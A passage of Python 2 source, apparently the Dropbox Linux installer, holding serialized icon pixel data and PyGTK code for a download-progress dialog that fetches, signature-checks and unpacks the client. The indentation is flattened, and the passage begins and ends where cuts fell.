\xf7\xff\xc5\xe2\xf7\xff\xc9\xe3\xf7\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xff_\xb2\xf1\xffd\xb4\xf1\xffi\xb7\xf1\xffn\xb9\xf1\xfft\xbc\xf1\xff{\xbe\xf1\xff\x81\xc1\xf1\xff\x88\xc4\xf1\xff\x8e\xc7\xf1\xff\x94\xca\xf1\xff\xa3\xd2\xf5\xff\x9e\xcd\xf0\xffQ\x95\xc6\xff\x03[\x9d\xff\x00W\x9a\xe9\x00\\\x9ei\x00\\\x9e\x01\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e.\x00Z\x9c\xb6\x00U\x99\xff(x\xb3\xff\x81\xbc\xe6\xff\xae\xdb\xfc\xff\xab\xd7\xf9\xff\xac\xd7\xf7\xff\xb1\xd9\xf7\xff\xb6\xdb\xf7\xff\xba\xdd\xf7\xff\xbd\xde\xf7\xff\xc2\xe0\xf7\xff\xc5\xe2\xf7\xff\xc9\xe3\xf7\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xff_\xb2\xf1\xffd\xb4\xf1\xffi\xb7\xf1\xffn\xb9\xf1\xfft\xbc\xf1\xff{\xbe\xf1\xff\x81\xc1\xf1\xff\x88\xc4\xf1\xff\x92\xca\xf3\xff\x9c\xd0\xf5\xffr\xae\xda\xff\x1dn\xab\xff\x00U\x99\xff\x00[\x9d\x9f\x00\\\x9e\x1d\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9ed\x00V\x99\xe9\x03[\x9e\xffL\x92\xc6\xff\xa1\xd0\xf3\xff\xb6\xde\xfc\xff\xb2\xda\xf7\xff\xb6\xdb\xf7\xff\xba\xdd\xf7\xff\xbd\xde\xf7\xff\xc2\xe0\xf7\xff\xc5\xe2\xf7\xff\xc9\xe3\xf7\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xff_\xb2\xf1\xffd\xb4\xf1\xffi\xb7\xf1\xffn\xb9\xf1\xfft\xbc\xf1\xff{\xbe\xf1\xff\x82\xc2\xf2\xff\x90\xca\xf6\xff\x82\xbe\xe9\xff8\x84\xbc\xff\x00X\x9b\xff\x00W\x9b\xd9\x00\\\x9eO\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x1c\x00[\x9d\x9f\x00T\x98\xff\x18j\xa8\xfft\xaf\xd9\xff\xb8\xde\xfa\xff\xbb\xdf\xfa\xff\xba\xdd\xf7\xff\xbd\xde\xf7\xff\xc2\xe0\xf7\xff\xc5\xe2\xf7\xff\xc9\xe3\xf7\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xff_\xb2\xf1\xffd\xb4\xf1\xffi\xb7\xf1\xffn\xb9\xf1\xfft\xbc\xf1\xff\x80\xc2\xf4\xff\x85\xc4\xf3\xffR\x9a\xcf\xff\rc\xa3\xff\x00U\x99\xf9\x00[\x9e\x88\x00\\\x9e\x0f\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9eG\x00X\x9b\xd0\x00V\x9a\xff=\x85\xbb\xff\xa3\xce\xee\xff\xc6\xe5\xfd\xff\xbf\xdf\xf8\xff\xc2\xe0\xf7\xff\xc5\xe2\xf7\xff\xc9\xe3\xf7\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xff_\xb2\xf1\xffd\xb4\xf1\xffi\xb7\xf1\xffo\xba\xf2\xff|\xc2\xf6\xffj\xb0\xe4\xff%w\xb4\xff\x00U\x99\xff\x00Z\x9c\xbc\x00\\\x9e3\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x08\x00\\\x9e{\x00T\x99\xf5\rb\xa2\xffk\xa5\xd0\xff\xbe\xdf\xf7\xff\xcb\xe6\xfb\xff\xc5\xe2\xf7\xff\xc9\xe3\xf7\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xff_\xb2\xf1\xffd\xb4\xf1\xffn\xbc\xf5\xffm\xb8\xf0\xff=\x8d\xc8\xff\x06^\x9f\xff\x00W\x99\xe9\x00\\\x9ed\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e0\x00Y\x9c\xbc\x00T\x98\xff*v\xb0\xff\x95\xc2\xe2\xff\xd0\xea\xfc\xff\xcd\xe6\xf9\xff\xcd\xe6\xf7\xff\xc8\xe3\xf7\xffe\xb5\xf2\xffY\xaf\xf1\xffa\xb4\xf3\xffj\xb9\xf5\xffN\x9f\xda\xff\x15k\xab\xff\x00V\x98\xff\x00Z\x9d\xa7\x00\\\x9e \x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9ec\x00V\x9a\xe4\x01Y\x9c\xffS\x93\xc2\xff\xbf\xdd\xf2\xff\xd9\xee\xfc\xff\xc9\xe3\xf7\xffe\xb5\xf2\xff^\xb4\xf6\xffZ\xad\xeb\xff(}\xbc\xff\x00Y\x9b\xff\x00X\x9b\xd7\x00\\\x9eO\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x18\x00[\x9d\x9a\x00S\x98\xff\x1cl\xa8\xff\x8d\xb9\xda\xff\xd1\xe9\xfb\xffk\xba\xf5\xff;\x92\xd3\xff\x0cd\xa5\xff\x00V\x99\xf7\x00[\x9d\x85\x00\\\x9e\r\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9eA\x00X\x9b\xd2\x00V\x9a\xff?\x87\xbb\xff&z\xb8\xff\x00W\x99\xff\x00Y\x9c\xc3\x00\\\x9e1\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x0b\x00\\\x9e\x81\x00V\x9a\xf0\x00X\x9a\xf2\x00\\\x9eu\x00\\\x9e\x03\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x0f\x00[\x9et\x00\\\x9ex\x00\\\x9e\x0b\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00', gtk.gdk.COLORSPACE_RGB, True, 8, 64, 64, 256)
window_icon = gtk.gdk.pixbuf_new_from_data('\x00\\\x9e\x00\x00\\\x9e\x00\x00^\xa0\x00\x00V\x99\x00\x00L\x91g\x00N\x93q\x00X\x9c\x00\x00^\x9f\x00\x00]\x9f\x00\x00Y\x9c\x00\x00P\x94o\x00M\x92i\x00V\x99\x00\x00^\xa0\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00^\xa0\x00\x00T\x97\x00\x00F\x8c_1\x81\xba\xff+|\xb6\xff\x00F\x8e?\x00\\\x9e\x00\x00\\\x9e\x00\x00J\x8e;$y\xb6\xff-\x7f\xbc\xff\x00E\x8cb\x00R\x97\x00\x00^\xa0\x00\x00\\\x9e\x00\x00[\x9d\x00\x00I\x8c*\x05X\x9b\xc0P\x9b\xd5\xff\xa7\xdd\xff\xff\xbb\xe5\xff\xff@\x86\xbb\xff\x00>\x89D\x00D\x89B\'{\xbb\xff\x89\xcf\xff\xff\xa2\xdb\xff\xffg\xa6\xd5\xff\x07Y\x9b\xc3\x00C\x8c,\x00[\x9d\x00\x05\\\x9e\x971\x84\xc5\xffk\xbb\xf6\xff\x8e\xd0\xff\xff\x86\xc3\xf0\xff\xa2\xd2\xf5\xff\xc4\xe7\xff\xffP\x90\xc0\xff\x15u\xbf\xfff\xbf\xff\xffx\xc1\xf6\xff\x80\xc0\xf0\xff\xb0\xdf\xff\xff\xa9\xd7\xf6\xff\\\x97\xc5\xff\x0b]\x9e\x98\x08[\x9e\xdcX\xb0\xf0\xff\x84\xd0\xff\xffx\xbc\xf0\xff\x83\xc2\xf0\xff\x88\xc3\xee\xff\xb1\xd7\xf3\xff\xf9\xff\xff\xff\xca\xec\xff\xffm\xba\xf3\xffX\xae\xee\xff{\xbe\xf0\xff\x91\xc7\xf0\xff\xd2\xf2\xff\xff\xa6\xd4\xf0\xff\x11]\x9e\xde\x00T\x96\x00\x00N\x91\x9eD\x98\xd5\xff\x84\xc9\xfc\xff\x85\xc3\xf1\xff\xb7\xdb\xf6\xff\xe9\xf4\xfc\xff\xe9\xf5\xfd\xff\xdb\xee\xfd\xff\xdf\xef\xfc\xff\xa8\xd5\xf6\xff|\xbf\xf1\xff\xa3\xd6\xfc\xffl\xaa\xd6\xff\x00J\x91\xa1\x00Q\x96\x00\x00^\xa0\x00\x00T\x97\x00\x008\x7f\x9eC\x94\xd1\xff\xde\xf6\xff\xff\xf5\xfc\xff\xff\xe0\xef\xfb\xff\xe0\xf0\xfb\xff\xc8\xe5\xfb\xff\xcf\xe7\xfb\xff\xff\xff\xff\xff\xfe\xff\xff\xffV\x9d\xd2\xff\x002\x80\xa2\x00Q\x96\x00\x00_\xa0\x00\x00W\x99\x00\x00I\x8cq9\x89\xc3\xf1Y\xb0\xf2\xffR\xaa\xef\xff\xbc\xde\xf7\xff\xf9\xfc\xfe\xff\xe3\xf2\xfb\xff\xd3\xea\xfc\xff\xf5\xfb\xff\xff\xb7\xdb\xf7\xffd\xb1\xed\xff\x86\xc3\xf2\xffR\x93\xc4\xf3\x00D\x8du\x00T\x99\x00\x06Z\x9d\xb3I\xa0\xe0\xff\x8a\xd2\xff\xffe\xb5\xf2\xff/\x97\xe8\xffK\xa4\xe9\xff\x9c\xcd\xf0\xff\xf6\xf9\xfc\xff\xd6\xec\xfc\xffX\xab\xf0\xff\x15\x8a\xe6\xff9\x9b\xe6\xff\x8c\xc6\xf1\xff\xd1\xf0\xff\xff\x8b\xbe\xe1\xff\x0e\\\x9d\xb6\x07]\x9f\xc1D\x98\xd9\xff\x85\xcd\xff\xffm\xbc\xf9\xff;\x9d\xe9\xff^\xae\xec\xffl\xb3\xe8\xff\xb7\xd9\xf2\xffC\xa2\xef\xff\x00s\xe5\xff3\x99\xea\xffL\xa3\xe7\xff\x96\xce\xf9\xff\xc7\xeb\xff\xff\x81\xb3\xd9\xff\x10_\x9f\xc4\x00X\x9a\x00\x00H\x8bU\x1eq\xad\xeeR\xa8\xe8\xffA\xa4\xf1\xff`\xae\xea\xff\xa9\xd3\xf2\xff\xc8\xe4\xf8\xffh\xb7\xf2\xff@\xa2\xed\xff,\x95\xe8\xffQ\xaa\xef\xff|\xba\xe9\xff*u\xae\xf1\x00A\x8bX\x00V\x9a\x00\x00\\\x9e\x00\x00]\x9f\x00\x00>\x84\x0c"v\xb3\xff\x9b\xdb\xff\xff\x97\xcf\xf8\xff\xce\xe6\xf8\xff\xc5\xe1\xf7\xffe\xb5\xf1\xfft\xbc\xf0\xffu\xbe\xf5\xff\xa9\xde\xff\xff0{\xb0\xff\x00:\x85\x0f\x00]\x9f\x00\x00]\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00Y\x9c\x00\x02S\x97zH\x89\xbf\xff\xb8\xe3\xfd\xff\xe8\xfb\xff\xff\xc2\xdf\xf7\xff`\xb3\xf1\xff\x82\xcb\xff\xff\xa1\xd3\xf7\xffJ\x88\xb8\xff\x00S\x96r\x00Z\x9d\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00]\x9f\x00\x00[\x9d\x00\x00C\x8b*\x08W\x9b\xc5\x8c\xb9\xda\xff\xea\xfd\xff\xff\x80\xcb\xff\xffG\x97\xd4\xff\x03W\x99\xbc\x00E\x8d"\x00[\x9e\x00\x00]\x9f\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00_\xa0\x00\x00Q\x96\x00\x00C\x8di>\x88\xbd\xff,\x7f\xbb\xff\x00G\x8c`\x00T\x98\x00\x00^\xa0\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00_\xa0\x00\x00R\x98\x00\x00I\x92r\x00P\x92n\x00V\x99\x00\x00^\xa0\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00', gtk.gdk.COLORSPACE_RGB, True, 8, 16, 16, 64)
GUI_AVAILABLE = os.environ.get("DISPLAY", '')
if GUI_AVAILABLE:
def download():
import pygtk
pygtk.require("2.0")
import gtk
import gobject
import pango
import webbrowser
gtk.gdk.threads_init()
load_serialized_images()
global FatalVisibleError
def FatalVisibleError(s):
error = gtk.MessageDialog(parent = None,
flags = gtk.DIALOG_MODAL,
type = gtk.MESSAGE_ERROR,
buttons = gtk.BUTTONS_OK,
message_format = s)
error.set_title("Error")
error.run()
gtk.main_quit()
sys.exit(-1)
class GeneratorTask(object):
def __init__(self, generator, loop_callback, on_done=None, on_exception=None):
self.generator = generator
self.loop_callback = loop_callback
self.on_done = on_done
self.on_exception = on_exception
def _run(self, *args, **kwargs):
self._stopped = False
try:
for ret in self.generator(*args, **kwargs):
if ret is None:
ret = ()
if not isinstance(ret, tuple):
ret = (ret,)
gobject.idle_add(self.loop_callback, *ret)
if self._stopped:
thread.exit()
except Exception, ex:
print ex
if self.on_exception is not None:
gobject.idle_add(self.on_exception, ex)
else:
if self.on_done is not None:
gobject.idle_add(self.on_done)
def start(self, *args, **kwargs):
t = threading.Thread(target=self._run, args=args, kwargs=kwargs)
t.setDaemon(True)
t.start()
def stop(self):
self._stopped = True
class DownloadDialog(gtk.Dialog):
def handle_delete_event(self, wid, ev, data=None):
self.handle_cancel(wid)
def handle_dont_show_toggle(self, button, data=None):
reroll_autostart(not button.get_active())
def handle_cancel(self, button):
if self.task:
self.task.stop()
if self.download:
self.download.cancel()
gtk.main_quit()
self.user_cancelled = True
def handle_ok(self, button):
# begin download
self.ok.hide()
self.download = DownloadState()
self.label.hide()
if self.dont_show_again_align is not None:
self.dont_show_again_align.hide()
self.progress.show()
def download_progress(progress, status):
if not status:
self.task.stop()
self.update_progress(DOWNLOADING, progress)
def finished():
self.update_progress(DOWNLOADING, 1.0)
self.unpack_dropbox()
def error(ex):
FatalVisibleError(ERROR_CONNECTING)
self.update_progress(DOWNLOADING, 0)
self.task = GeneratorTask(self.download.copy_data,
download_progress,
finished, error).start()
def update_progress(self, text, fraction):
self.progress.set_text(text % int(fraction*100))
self.progress.set_fraction(fraction)
def unpack_dropbox(self):
def unpack_progress(name, i, total):
self.update_progress(UNPACKING, float(i)/total)
def finished():
self.update_progress(UNPACKING, 1.0)
gtk.main_quit()
def error(ex):
if isinstance(ex, SignatureVerifyError):
FatalVisibleError(ERROR_SIGNATURE)
else:
FatalVisibleError(ERROR_CONNECTING)
self.task = GeneratorTask(self.download.unpack,
unpack_progress,
finished, error).start()
def mouse_down(self, widget, event):
if self.hovering:
self.clicked_link = True
def mouse_up(self, widget, event):
if self.clicked_link:
webbrowser.open(LINK)
